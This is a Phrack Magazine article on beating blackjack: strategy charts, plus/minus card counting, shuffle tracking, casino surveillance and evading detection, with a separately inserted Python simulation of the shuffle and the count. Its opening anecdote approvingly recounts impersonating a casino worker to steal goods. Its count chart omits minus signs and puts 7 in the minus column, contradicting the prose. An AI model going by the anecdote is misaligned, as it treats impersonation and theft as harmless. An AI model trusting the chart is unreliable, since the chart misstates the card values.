I hope you don't think this is weird but I keep a copy of a certain Basic Strategy chart in my wallet at ALL times...just in case. Just in case of what you ask? Permit me to go off on a slight(?) tangent. The following story really happened. In 1984 I was visiting LOD BBS co-sysop, Paul Muad'dib up in New York City. After about a week we were very low on cash despite the Pay Phone windfall mentioned in my Phrack Pro-Phile ;->. I contacted a friend of mine who was working in New Jersey and he offered us a job for a couple of days. I spent just about the last of my cash on bus fare for me and Paul figuring that I would be getting more money soon. Somehow, the destination was miscommunicated and we ended up in Atlantic City, which was not the location of the job. We were stuck.
Our only recourse was to attempt to win some money to get us back on track. First we needed a little more capital. Paul, being known to physically impersonate phone company workers, and a Department of Motor Vehicles computer technician among others, decided to impersonate a casino employee so he could "look around". Look around he did, found a storage closet with a portable cooler and a case of warm soda, not exactly a gold mine but hey. He proceeded to walk that stuff right out of the casino. We commandeered some ice and walked around the beach for an hour selling sodas. It wasn't all that bad as scantily clad women seemed to be the ones buying them. To cut the story short, Paul knew ESS but he didn't know BlackJack. He lost and we resorted to calling up Sharp Razor, a fellow Legion member residing in NJ, who gave us (or is it lent?) the cash to continue our journey. For the record, I was fairly clueless about BlackJack at the time which really means that I thought I knew how to play but really didn't because I didn't even know Basic Strategy. The same goes for Paul. Had we had a chart on hand, we would at least have made the correct plays. 
Here are the charts, memorize the one that is appropriate:

               Las Vegas Single Deck Basic Strategy Table

                          Dealer's Up-Card
     Your  +---+---+---+---+---+---+---+---+----+---+
     Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |  8  | H | H | H | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |  9  | D | D | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 10  | D | D | D | D | D | D | D | D | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 11  | D | D | D | D | D | D | D | D | D  | D |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 12  | H | H | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 13  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 14  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 15  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 16  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 17  | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,2 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,3 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,4 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,5 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,6 | D | D | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,7 | S | D | D | D | D | S | S | H | H  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,8 | S | S | S | S | D | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,9 | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,A | P | P | P | P | P | P | P | P | P  | P |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 2,2 | H | P | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 3,3 | H | H | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 4,4 | H | H | H | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 6,6 | P | P | P | P | P | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 7,7 | P | P | P | P | P | P | H | H | S  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 8,8 | P | P | P | P | P | P | P | P | P  | P |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 9,9 | P | P | P | P | P | S | P | P | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |10,10| S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+

     H = Hit    S = Stand    D = Double Down    P = Split


               Las Vegas Multiple Deck Basic Strategy Table

                          Dealer's Up-Card
     Your  +---+---+---+---+---+---+---+---+----+---+
     Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |  8  | H | H | H | H | H | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |  9  | H | D | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 10  | D | D | D | D | D | D | D | D | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 11  | D | D | D | D | D | D | D | D | D  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 12  | H | H | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 13  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 14  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 15  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 16  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 17  | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,2 | H | H | H | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,3 | H | H | H | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,4 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,5 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,6 | H | D | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,7 | S | D | D | D | D | S | S | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,8 | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,9 | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,A | P | P | P | P | P | P | P | P | P  | P |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 2,2 | H | H | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 3,3 | H | H | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 4,4 | H | H | H | H | H | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 6,6 | H | P | P | P | P | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 7,7 | P | P | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 8,8 | P | P | P | P | P | P | P | P | P  | P |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 9,9 | P | P | P | P | P | S | P | P | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |10,10| S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+

     H = Hit    S = Stand    D = Double Down    P = Split


               Atlantic City Multiple Deck Basic Strategy Table

                          Dealer's Up-Card
     Your  +---+---+---+---+---+---+---+---+----+---+
     Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |  8  | H | H | H | H | H | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |  9  | H | D | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 10  | D | D | D | D | D | D | D | D | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 11  | D | D | D | D | D | D | D | D | D  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 12  | H | H | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 13  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 14  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 15  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 16  | S | S | S | S | S | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 17  | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,2 | H | H | H | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,3 | H | H | H | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,4 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,5 | H | H | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,6 | H | D | D | D | D | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,7 | S | D | D | D | D | S | S | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,8 | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,9 | S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | A,A | P | P | P | P | P | P | P | P | P  | P |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 2,2 | P | P | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 3,3 | P | P | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 4,4 | H | H | H | P | P | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 6,6 | P | P | P | P | P | H | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 7,7 | P | P | P | P | P | P | H | H | H  | H |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 8,8 | P | P | P | P | P | P | P | P | P  | P |
     +-----+---+---+---+---+---+---+---+---+----+---+
     | 9,9 | P | P | P | P | P | S | P | P | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+
     |10,10| S | S | S | S | S | S | S | S | S  | S |
     +-----+---+---+---+---+---+---+---+---+----+---+

     H = Hit    S = Stand    D = Double Down    P = Split


End of "How To Hack BlackJack": File 1 of 2

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 10 of 27

How to "Hack" BlackJack
By Lex Luthor
lex@mindvox.phantom.com

Part 2 of 2 (50K)


Card Counting:
--------------

Card Counting? Don't you have to be some sort of mathematical genius or have a photographic memory to count cards? No, these are as mythical as that 415-BUG-1111 "trace detector" number posted on all those old hacker BBSes. Well, you may now say, what if the casino is using 4, 6, or even 8 decks? Surely you can't keep track of 300+ cards! Don't sweat these details. Probably the hardest part about learning to play successful BlackJack has already been accomplished in the previous section. That is: memorizing the appropriate basic strategy chart. All you really need to count cards is the ability to count up to plus or minus twelve or so...by ONES! Of course there are more complicated systems but that is all you need to do for the simplest ones.

The first card counting systems were developed by our old friend Dr. Thorp. He determined through mathematical computation that the card that has the most influence on the deck being in a favorable condition (for the player) was the five. When the deck is low in fives, the player has a higher advantage than if it's sparse in any other card.
Logic dictated that for a very simple card counting strategy, simply keep track of the abundance (or lack thereof) of fives. This is the basis of his "Five Count" system which was later improved to include tens and renamed the "Ten Count" system.

Today, there are many different card counting systems. Typically, the more complex a system is, the better your advantage should you master it. However, the difference between card counting System X and System Y is usually so small that ease of using the system becomes more important than gaining an additional .15% advantage or whatever it is. I am going to restrict the discussion to a single card counting system: the high/low (also called the plus/minus) point count. This strategy is very easy to master. Two other methods that I recommend if you're serious are the Advanced Plus/Minus and the "Hi-Opt I" systems. The former is similar to the high/low but assigns fractional values to certain cards as opposed to integer values which are easier to add in your head. The latter method is considered one of the most powerful yet reasonable (with respect to complexity) counting systems of all time and is detailed extensively on pages 213 to 277 of [7].

The quick and dirty reason why card counting works is this: The player gains an advantage when a deck has a SHORTAGE of cards valued 2, 3, 4, 5, 6, 7, 8. When a deck has a SHORTAGE of cards valued 9, 10, Ace; the player has a DISadvantage. If you can tell when the deck is rich in 9's, 10's, and Aces (ie, when you hold the advantage) you can do one of the following things:

1) Bet more money when the deck is favorable to you.
2) Alter your Basic Strategy play to account for the favorability thereby increasing the odds of winning a particular hand.
3) Combine 1 & 2 by betting more AND altering Basic Strategy.

Now let's discuss the +/- Point Count. As you can see from the small chart below, a plus value is given to low cards, and a minus value is given to high cards.
Notice that 7, 8, and 9 have a value of zero. This is because their overall effect is negligible as compared to the others. Some systems use a value of -2 for the Ace instead of -1 and give a value of +1 to the seven instead of zero. If you are using a BlackJack computer game for practice, check to see what card counting system(s) it uses. They should offer one of the above two variations. Learn that one, since it will allow you to prepare well for actual casino play. See the "Some Comments Regarding Computer BlackJack Programs for the PC" section for more on this. Now the chart:

     +-----------------------------------------+
     |     PLUS (+1)     ||     MINUS (-1)     |
     +-----------------------------------------+
     | 2 | 3 | 4 | 5 | 6 || 7 | 8 | 9 | 10 | A |
     +-----------------------------------------+
     | 1 | 1 | 1 | 1 | 1 || 0 | 0 | 0 | 1  | 1 |
     +-----------------------------------------+

As you may notice, this is a balanced system. There are 20 cards in a deck that are valued +1: two through six. There are 16 ten value cards and 4 Aces in a deck (20 total) that are valued -1. The remaining 12 cards (7, 8, 9) have a value of zero. At the end of a deck the count should be zero. A good drill to practice is to get a deck of cards, turn them over one by one, and keep track of the count. If you enter a game mid-way through the deck or shoe, flat bet until the cards are shuffled. Once the cards are shuffled commence counting from zero.

Let's do a quick example using ten cards. The following ten cards are shown in the course of a hand: A, 4, 7, 10, 10, 9, 10, 2, 10, 5. Just so no one gets lost, we will do one card at a time and then keep the running total: the first value is -1 (the Ace) & the second is +1 (the 4) = 0 (the current total hand count). The next card is the 7 which is zero so disregard it. The next card is a ten so the total count is now -1. The next card is another ten, giving a total count of -2.
The next card is a nine which has a value of zero so ignore it, total count is still at -2. Next is a ten, total count is at -3. Next is a two which adds +1 to the minus three yielding a total of -2. A quick look at the next two cards shows that the two will cancel each other out (-1+1=0). So at the end of a hand of ten cards dealt to 2 players and the dealer, the point count is minus two. This provides you with the knowledge that you are at a slight disadvantage. Your next bet should either be the same or a unit or two lower.

From this example you see that it would be easier to count cards if you play in a "cards-up" game. That way you can see all the cards as they are dealt and count them as they go by. When the dealer deals fast, just count every two cards. You still count each card but you only add to your total count after every two cards since many times the two values will cancel each other out to give a net value of zero, which doesn't need to be added to your total.

If you play in a cards-down game, you may want to consider playing at third base. The reason is that in a cards-down game you only see the other players' cards:

a) if you peek at their hand (not polite but it's not cheating like in poker)
b) if a player busts
c) when the dealer settles each player's hand.

When there are other people at a table, all this happens rather quickly and you may miss a few cards here and there which essentially invalidates your count. You can't control how fast the dealer deals, but you can slow things down when the dealer prompts you for a play decision.

I am not going to discuss changing basic strategy here. The chart you memorize in the Basic Strategy section of this file will be fine for now. If you are already adept at the plus/minus count then find a book that has a complete system including the appropriate changes to Basic Strategy that reflect the current running and/or true count.
For one deck, alter your wager according to the following table:

        BET UNITS     +/- Running Count
        -----------------------------
            1           +1 or less
            2           +2 or +3
            3           +4 or +5
            4           +6 or +7
            5           +8 or more

Example: After the first hand of a one deck game, the point count is plus four and you just bet a $5.00 chip. Before the next hand is dealt, wager $15.00 (three units of $5.00) as the above table mandates.

What if there are four, six, or more decks instead of just one? I recommend that you perform a "true-count" rather than trying to remember different betting strategies for different number of deck games. By doing a true count, the above table can still be used.

The True Count is found by the ensuing equation. I provide an example along with it for the case of having a running count of +9 with one and a half decks left unplayed. It doesn't matter how many decks are used, you just have to have a good eye at guesstimating the number of decks that are left in the shoe. I just measured the thickness of a deck of cards to be 5/8 (10/16) of an inch. Hence the thickness of a half deck is 5/16 of an inch. One and a half decks would be 10/16 + 10/16 + 5/16 = 25/16 or a little over an inch and a half. You probably see a relationship here. The number of decks is approximately equal to the height of the cards in inches. Easy.

                        Running Count          +9
        True Count = ---------------------- = ----- = +6
                      # of Decks Remaining     1.5

Looking at the table of betting units above, the proper wager would be four units.

If you have trouble keeping the count straight in your head, you can use your chips as a memory storage device. After every hand tally up the net count and update the running or true count by rearranging your chips. This is somewhat conspicuous however, and if done blatantly, may get you labeled a counter.

If for some reason you despise the notion of counting cards, you may want to pick up Reference [11], "Winning Without Counting".
The author writes about using kinesics (body language) to help determine what the dealer's hole card is after checking for a Natural. He claims that certain dealers have certain habits as far as body language is concerned, especially when they check to see if they have a BlackJack. The dealer will check the hole card if he/she has a ten value card or an Ace as the up-card. When the hand is over you will see what the hole card really was. You may be able to discern a certain characteristic about the dealer, such as a raising of the eyebrows whenever the hole card is a 2-9 or perhaps a slight frown, etc.

There is some usefulness to this method but I wouldn't rely on it very much at all. I have only used it for one particular situation. That being when the dealer has a ten up card and checks to see if the hole card is an Ace. Note that many dealers check the hole card very quickly and turn up just the corner of the card so as to prevent any of the players from seeing the card. If the hole card is an Ace, the dealer will turn over the card and declare a BlackJack. However, if the hole card is a 4, many times the dealer will double check it. The reason for this double take is simply that a 4 looks like an Ace from the corner; get a deck of cards and see for yourself. A 4 really looks like an Ace and vice-versa when the corner is checked in a QUICK motion. So, if you see the dealer double check the hole card and NOT declare a BlackJack, you can be fairly sure the hole card is a four, giving the dealer a total of 14. You can now adjust your basic strategy play accordingly. This situation has only come up a few times in my case, but once was when I had a $50.00 bet riding on the hand and I won the hand by using that additional information.

Dr. Julian Braun has previously calculated that the player has about a 10% advantage over the house should he/she know what the dealer's hole card is. This is quite substantial.
Of course you have to memorize a specific Basic Strategy chart for the case of knowing what the dealer's total is in order to obtain the maximum benefit. I haven't bothered memorizing this chart simply because it is a rare occurrence to know what the dealer's hole card is. If you sit down at a table with an inexperienced dealer, you might catch a couple more than usual, but I don't think it is enough to warrant the extra work unless you want to turn pro.

Another thing Winning Without Counting mentions is to pay attention to the arches and warps in the cards. Perhaps a lot of the ten value cards have a particular warp in them due to all those times the dealer checked for a BlackJack. The author claims that he has used this to his advantage. Maybe so, but I don't put much stock in this technique. I have enough things to worry about while playing.

One last thing. There is no law or rule that says a dealer cannot count cards. A dealer may count cards because he or she is bored but more likely is that the casino may encourage counting. The reason being that if the deck is favorable to the player, the house can know this and "shuffle up". This is also called preferential shuffling (a game control measure) and it vaporizes your advantage.

Shuffle Tracking:
-----------------

Shuffle What? Shuffle Tracking. This is a fairly new (15 years +/-) technique that has not been publicized very much. One problem with many of the BlackJack books out there is that they are not hip to the current game. The obvious reason for this is that many are old or simply re-formulate strategies that were invented decades ago. It's just like reading "How to Hack the Primos Version 18 Operating System" today. The file may be interesting, many of the commands may be the same, but it doesn't detail how to take advantage of, and subvert the CURRENT version of the OS.
The best definition I have seen is this one quoted from Reference [5]: "'Shuffle-tracking' is the science of following specific cards through the shuffling process for the purpose of either keeping them in play or cutting them out of play."

The concept of Shuffle tracking appears to have resulted from bored mathematicians' research and computer simulation of shuffling cards, a familiar theme to BlackJack you say. The main thing that I hope every reader gets from this section is that just because someone shuffles a deck (or decks) of cards does not in any way mean that the cards are "randomized". The methods mentioned in the two previous sections (Basic Strategy and Card Counting) ASSUME A RANDOM DISTRIBUTION OF CARDS! That is an important point. According to some authors, a single deck of cards must be shuffled twenty to thirty times to ensure a truly random dispersion. If a Casino is using a 6 deck shoe, that's 120 to 180 shuffles! Obviously they aren't going to shuffle anywhere near that many times. But don't despair, there are some types of shuffles which are good, and some that are bad. In fact, if the cards were always randomly dispersed, then you would not be reading this section due to its lack of relevance. As in the Card Counting section, I am going to restrict the discussion to the basics of shuffle tracking as the combination of references listed at the end of this section provide a complete discourse of the topic.

A beneficial (to the player) shuffle for a one deck game is executed by dividing the deck equally into 26 cards and shuffling them together a minimum of three times. This allows the cards to be sufficiently intermixed to yield a fairly random distribution. An adverse shuffle prevents the cards from mixing completely.

The simplest example is the Unbalanced Shuffle. As its name implies, the dealer breaks the deck into two unequal stacks.
As an example, let's say you are playing two hands head on with the dealer and the last 10 cards in the deck are dealt. The result of the hand was that both your hands lost to the dealer primarily due to the high percentage of low value cards in the clump. Note that if you were counting, you would have bet a single unit since the deck was unfavorable. The dealer is now ready to shuffle the deck, and separates the deck into 31 cards in one stack and 21 in the other stack. The dealer shuffles the two stacks. If the shuffle is done from the bottom of each stack on up, the top ten cards of the larger stack will remain intact without mixing with any of the other cards. Those ten cards can remain in the order they were just dealt throughout the shuffle if the process of bottom to top shuffling is not altered. You are now asked to cut the deck. If you don't cut the deck, the 10 cards that were dealt last hand will be dealt as your first two hands. The result will be the same as your last and you will lose the two hands. However, if you cut the deck exactly at the end of those ten cards, you have just altered the future to your benefit. Those cards will now be placed at the bottom of the deck. Should the dealer shuffle up early, you will avoid them altogether. In addition, if you were keeping count, you would know that the deck was favorable during the first 3-4 hands since there would be an abundance of tens in the portion of the deck that will be played. You would accordingly increase your bet size to maximize your winnings.

Some dealers will unknowingly split the deck into unequal stacks. However, more often than not, they are REQUIRED to split the deck into unequal stacks. If they are required to do this, they are performing the House Shuffle. The casino has trained the dealer to shuffle a particular way...on purpose! Why? Because in the long run, the house will benefit from this because most players will not cut any bad clumps out of play.
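The unbalanced shuffle and the cut described above can be checked with a short simulation, which also applies the plus/minus count, true count and betting table from the Card Counting section. This is an added example, not part of the original file; the function names are made up for illustration, and it assumes an idealized riffle that drops one card at a time alternately from the bottom of each stack, that the ten dealt cards were picked up onto the top of the deck, and that fractional true counts round down.

```python
import math
import random

# Plus/minus values from the article: 2-6 count +1, 7-9 count 0, tens and Aces -1.
VALUES = {r: +1 for r in "23456"}
VALUES.update({r: 0 for r in "789"})
VALUES.update({r: -1 for r in ("10", "J", "Q", "K", "A")})
RANKS = list(VALUES)
SUITS = "SHDC"


def running_count(cards):
    """Sum the plus/minus values of (rank, suit) tuples or bare rank strings."""
    return sum(VALUES[c[0] if isinstance(c, tuple) else c] for c in cards)


def true_count(running, decks_remaining):
    """Running count divided by the number of decks left unplayed."""
    return running / decks_remaining


def bet_units(count):
    """Article's betting table: 1 unit at +1 or less, up to 5 units at +8 or more.
    Fractional counts are rounded down (an assumption; the article does not say)."""
    return max(1, min(5, math.floor(count) // 2 + 1))


def riffle_bottom_up(first, second):
    """Idealized riffle: alternate single cards from the bottom of each stack.
    Stacks and result are lists with index 0 as the top card."""
    a, b = list(first), list(second)
    pile = []                       # built bottom-first
    while a or b:
        if a:
            pile.append(a.pop())    # pop() releases the current bottom card
        if b:
            pile.append(b.pop())
    pile.reverse()
    return pile


def riffle_n(deck, split, times=1):
    """Split the deck after `split` cards and riffle the stacks, `times` times."""
    for _ in range(times):
        deck = riffle_bottom_up(deck[:split], deck[split:])
    return deck


def cut(deck, n):
    """Cut n cards off the top and place them at the bottom."""
    return deck[n:] + deck[:n]


def longest_run(deck, clump):
    """Length of the longest block of adjacent clump cards in the deck."""
    members, best, run = set(clump), 0, 0
    for card in deck:
        run = run + 1 if card in members else 0
        best = max(best, run)
    return best


def demo():
    # Constructed scenario: the last ten cards dealt were all low cards.
    clump = [(r, s) for s in "SH" for r in "23456"]
    rest = [(r, s) for s in SUITS for r in RANKS if (r, s) not in clump]
    random.Random(43).shuffle(rest)       # arbitrary order for the other 42 cards
    deck = clump + rest                   # assumption: clump picked up onto the top

    unbalanced = riffle_n(deck, 31)       # the 31/21 split from the article
    balanced = riffle_n(deck, 26, times=3)
    after_cut = cut(unbalanced, 10)       # cut exactly below the clump

    # The clump is known and now out of play, so count it as already seen.
    seen = running_count(clump)
    decks_left = (len(deck) - len(clump)) / 52
    tc = true_count(seen, decks_left)
    return {
        "clump_intact": unbalanced[:10] == clump,
        "run_unbalanced": longest_run(unbalanced, clump),
        "run_balanced_x3": longest_run(balanced, clump),
        "clump_at_bottom": after_cut[-10:] == clump,
        "true_count": tc,
        "units": bet_units(tc),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

With the 31/21 split the ten-card clump comes out of the shuffle untouched, while three 26/26 riffles leave no two of its cards adjacent.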
If you have played BlackJack in a casino, how much did you pay attention to the way they shuffled? Like most people you were probably oblivious to it, perhaps you figured that during the shuffle would be a good time to ask that hot waitress for another drink. Regardless, you now see that it may be a good idea to pay attention during the shuffle instead of that set of "big breastseses" as David Allen Grier says on the "In Living Color" TV show ;)-8-< There are a number of shuffle methods, some of which have been labeled as: the "Zone Shuffle", the "Strip Shuffle", and the "Stutter Shuffle". The Zone Shuffle is particular to shoe games (multiple deck games) and is probably one of the most common shuffle methods which is why I mention it here. It is accomplished by splitting the shoe into 4 to 8 piles depending on the number of decks in the shoe. Prescribed picks from each pile are made in a very exact way with intermittent shuffles of each pair of half deck sized stacks. The net effect is a simple regrouping of the cards pretty much in the same region of the shoe as they were before, thereby preventing clumps of cards from being randomly mixed. If the dealer won 40 hands and you won 20, this trend is likely to continue until you are broke or until the unfavorable bias is removed through many shuffles. What if the players are winning the 40 hands and the dealer only 20? If the dealer has been mentally keeping track of how many hands each side has won in the shoe, the dealer will probably do one of two things. One is to keep the shuffle the same, but 'strip' the deck. When a dealer strips a deck, he/she strips off one card at a time from the shoe letting them fall on top of one another onto the table. This action causes the order of the cards to be reversed. The main consequence is to dissipate any clumping advantages (a bunch of tens in a clump) that the players may have. 
The second thing the dealer may do is simply change the way they shuffle to help randomize the cards.

I personally believe that casinos use certain shuffles on purpose for the sole reason that they gain some sort of advantage. A BlackJack dealer friend of mine disputes the whole theory of card clumping and shuffle tracking though. The mathematics and simulation prove the non-random nature of certain shuffles under controlled conditions. Perhaps in an actual casino environment the effect isn't as high. Regardless, next time you are playing in a casino and it's time to shuffle a shoe, ask the dealer to CHANGE the WAY he/she shuffles. The answer will nearly always be NO. Try to appeal to the pit boss and he/she will probably mumble something about casino policy. Why are they afraid to change the shuffle?

Relevant Reading: [4], [5] Chapters 5 and 6 pages 71 to 98, [14] pages 463 to 466, and [15] which is very detailed and accessible via Internet FTP.

Casino Security and Surveillance:
--------------------------------

I figured this section might get some people's attention. It is important to know what the casino is capable of as far as detecting cheating (by employees and customers) and spotting card counters.

EYE IN THE SKY: A two way mirror in the ceiling of the casino. It's not hard to spot in older casinos as it usually is very long. Before 1973 or so, employees traversed catwalks in the ceiling and it was easy for dealers and players to hear when they were being watched. Sometimes dust from the ceiling would settle down onto a table when someone was above it. Newer casinos use those big dark plexiglass bubbles with video cameras which should be watched constantly. These cameras have awesome Z00M capabilities and according to Reference [9], the cameras can read the word "liberty" on a penny placed on a BlackJack table. I am sure the resolution is better than that for the latest equipment.
The video images are also taped for use as evidence should anything that is suspect be detected. Just like computer security audit logs, if no one pays attention to them, they don't do much good. If you want a job monitoring gamblers and casino employees, you need to train for about 500 hours (about twenty 40 hour weeks) to learn all the tricks people try to pull on you. Pretty intensive program wouldn't you say?

CASINO EMPLOYEES: Then there are the casino employees. The dealers watch the players, the floor men watch the dealers and the players, the pitbosses watch the dealers, the floormen, and the players, etc. There may be plain clothes detectives roaming about. In a casino, everyone is suspect.

BLACK BOOK: A company that you will see mentioned in a lot of casino books is Griffin Investigations. They periodically update a book that casinos subscribe to that has pictures and related info on barred card counters and known casino cheats.....I suppose the "black book" as it is called, is analogous to the "Bell security hit-lists", that had (have?) files on known phreaks and hackers.

Social Engineering the Casino:
------------------------------

If you are good at getting an ESS operator to enter NET-LINE on DN COE-XXXX, and at getting those "Engineering Resistant Hard Asses up at SNET (Southern New England Telephone)" [as The Marauder affectionately calls them] to give you the new CRSAB number; then this section will be a piece of cake for you to master.

References [3], [7], and [8] have many stories regarding playing in casinos, getting barred, and various exploits. I am not going to repeat any of them here. In each of those books, the authors talk about their first experiences getting barred. In each case they were fairly bewildered as to why they were kicked out, at least until some casino employee or owner told them things like "you're just too good" and the ever diplomatic: "we know your kind, get the hell out!".
As you probably have gathered thus far, card counters are as undesirable in a casino as a phone phreak is in a central office. There are a number of behavioral characteristics which have been attributed to the 'typical' card counter.

Probably the most obvious act of a counter is a large increase in bet size. If you recall in the Card Counting section, when the deck is favorable, you bet more. When the deck is unfavorable, you bet less. Dr. Thorp's original system required a variation in bet size from one to ten units. When the deck is favorable the system may dictate that you go from a ten dollar bet to a hundred dollar bet. Kind of gets the attention of the dealer and the pit boss. However, this type of wild wagering is typical of big money hunch bettors. Hunch bettors will just plop down a bunch of chips at random due to 'hunches'. Therefore, a large increase in bet size won't necessarily cause you to be pegged as a counter.

Intense concentration, never taking your eyes off the cards, lack of emotion...ie, playing like a computer, is pretty much a give away that you are counting. Other things such as 'acting suspicious', meticulously stacking your chips, betting in discernible patterns, and a devout abstention from alcohol may also attract unwanted attention.

Another criterion used for spotting counters is if there are two or more people playing in concert with one another. Ken Uston is famous for his BlackJack teams. They have literally won millions of dollars collectively. When the "Team-LOD" gets together to play, we have to pretend we don't know each other so as not to attract undue attention ;-)

